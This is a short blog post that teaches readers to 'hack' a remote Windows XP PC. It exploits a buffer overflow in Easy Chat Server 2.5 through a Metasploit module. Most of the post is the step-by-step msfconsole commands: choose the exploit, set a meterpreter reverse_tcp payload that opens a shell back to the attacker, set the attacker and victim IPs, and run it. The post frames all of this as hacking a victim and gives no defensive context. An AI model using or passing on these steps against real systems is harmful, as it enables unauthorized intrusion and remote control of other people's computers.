Warung Online
Headlines News :
mas template
Home » , » Hack Remote PC using EFS Easy Chat Server Authentication Request Handling Buffer Overflow Attack

Hack Remote PC using EFS Easy Chat Server Authentication Request Handling Buffer Overflow Attack

Written By Trik Cari Duit on Kamis, 12 April 2012 | 07.09

This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending a overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to "C:\Program Files\Easy Chat Server", is concatentated with "\users\" and the string passed as the username HTTP parameter.

Exploit Targets
Easy Chat Server 2.5

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/http/efs_easychatserver_username

Msf exploit (efs_easychatserver_username)>set payload windows/meterpreter/reverse_tcp
Msf exploit (efs_easychatserver_username)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (efs_easychatserver_username)>set rhost 192.168.1.8 (IP of Victim PC)
Msf exploit ( efs_easychatserver_username )>exploit  

Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger